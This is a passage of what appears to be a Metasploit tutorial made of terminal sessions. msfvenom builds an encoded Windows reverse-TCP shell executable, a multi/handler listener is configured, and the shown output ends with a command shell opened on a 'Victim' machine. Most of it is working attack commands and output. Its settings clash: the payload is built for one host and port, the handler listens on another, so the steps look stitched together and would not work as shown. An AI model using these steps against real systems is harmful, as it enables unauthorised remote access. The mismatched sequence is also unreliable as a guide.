- root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
- Found 1 compatible encoders
- Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
- x86/shikata_ga_nai succeeded with size 326 (iteration=0)
- x86/shikata_ga_nai chosen with final size 326
- Payload size: 326 bytes
- Saved as: /tmp/1.exe
- root@kali:# file /tmp/1.exe
- /tmp/1.exe: PE32 executable (GUI) Intel 80386, for MS Windows
- _______________________________
- root@kali:# msfconsole
- =[ metasploit v4.11.3-2015063001 [core:4.11.3.pre.2015063001 api:1.0.0]]
- + -- --=[ 1465 exploits - 839 auxiliary - 230 post ]
- + -- --=[ 428 payloads - 37 encoders - 8 nops ]
- msf > use exploit/multi/handler
- msf exploit(handler) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- ----------------------------------------
- msf exploit(handler) > set payload windows/shell/reverse_tcp
- payload => windows/shell/reverse_tcp
- msf exploit(handler) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/shell/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC thread yes Exit technique: seh, thread, process
- LHOST yes The local address
- LPORT 4444 yes The local port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) > set LHOST 172.16.104.130
- LHOST => 172.16.104.130
- msf exploit(handler) > set LPORT 31337
- LPORT => 31337
- msf exploit(handler) >
- Now that we have everything set up and ready to go, we run ‘exploit’ for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us with our shell.
- msf exploit(handler) > exploit
- [*] Handler binding to LHOST 0.0.0.0
- [*] Started reverse handler
- [*] Starting the payload handler...
- [*] Sending stage (474 bytes)
- [*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150)
- Microsoft Windows XP [Version 5.1.2600]
- (C) Copyright 1985-2001 Microsoft Corp.
- C:\Documents and Settings\Victim\My Documents>